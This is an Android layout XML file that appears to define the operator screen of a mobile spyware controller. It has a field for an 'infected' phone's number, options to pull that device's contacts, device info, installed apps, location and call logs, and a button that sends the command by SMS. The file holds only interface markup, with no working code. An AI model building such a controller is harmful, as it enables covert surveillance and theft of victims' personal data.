<?xml version="1.0" encoding="utf-8"?>
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    tools:context="com.lu.mbcontrol.FunctionActivity">
    <TextView
        android:id="@+id/TV_page_SMSsent"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:text="短信指令发送"
        android:textSize="22dp"
        android:gravity="left"
        android:textColor="#566270"
        android:clickable="true"/>
<LinearLayout
    android:layout_below="@id/TV_page_SMSsent"
    android:id="@+id/Lin_phoneNUmber"
    android:layout_width="match_parent"
    android:layout_height="wrap_content"
    android:layout_marginTop="20dp"
>
    <TextView
        android:id="@+id/textView"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:text="输入手机号："
        android:textSize="16dp" />

    <EditText
        android:id="@+id/ET_phoneNumber_send"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:digits="1234567890"
        android:inputType="phone|number"
        android:maxLength="11"
        android:hint="感染端手机号"
        android:textSize="15dp"
         />
</LinearLayout>
    <TextView
        android:id="@+id/TV_tip"
        android:layout_below="@id/Lin_phoneNUmber"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:text="选择上传数据："
        android:textSize="16dp"
        android:layout_marginTop="20dp"/>
    <RadioGroup
        android:id="@+id/RG"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:layout_below="@id/TV_tip"
        android:layout_marginTop="30dp"
        android:gravity="center"
        >
        <RadioButton
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:id="@+id/contactRb"
            android:text="获取用户通讯录    "
            android:textSize="16dp"
            />
        <RadioButton
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:id="@+id/deviceRb"
            android:text="获取用户设备信息"
            android:textSize="16dp"
            android:layout_marginTop="10dp"
            />
        <RadioButton
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:id="@+id/appinstalledRb"
            android:text="获取用户安装应用"
            android:textSize="16dp"
            android:layout_marginTop="10dp"
            />
        <RadioButton
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:id="@+id/locationRb"
            android:text="获取用户手机位置"
            android:textSize="16dp"
            android:layout_marginTop="10dp"
            />
        <RadioButton
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:id="@+id/callRb"
            android:text="获取用户通话记录"
            android:textSize="16dp"
            android:layout_marginTop="10dp" />
    </RadioGroup>
    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:layout_below="@id/RG"
        android:layout_marginTop="30dp"
        android:gravity="center">
        <Button
            android:id="@+id/BT_go"
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:text="发送指令"
            android:background="#58C9B9"
            />
    </LinearLayout>
    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:layout_alignParentBottom="true"
        android:layout_gravity="center"
        android:orientation="horizontal">
        <Button
            android:id="@+id/BT_changePage2netCode_function"
            android:layout_width="fill_parent"
            android:layout_height="wrap_content"
            android:text="网络指令设置"
            android:background="@drawable/buttomshape"
            android:layout_weight="1"/>
        <Button
            android:id="@+id/BT_changePage2serach_function"
            android:layout_width="fill_parent"
            android:layout_height="wrap_content"
            android:text="手机数据查询"
            android:background="@drawable/buttomshape"
            android:layout_weight="1"/>
        <Button
            android:id="@+id/BT_changePage2shop_function"
            android:layout_width="fill_parent"
            android:layout_height="wrap_content"
            android:text="天天特价数据"
            android:background="@drawable/buttomshape"
            android:layout_weight="1"
            />
    </LinearLayout>

</RelativeLayout>
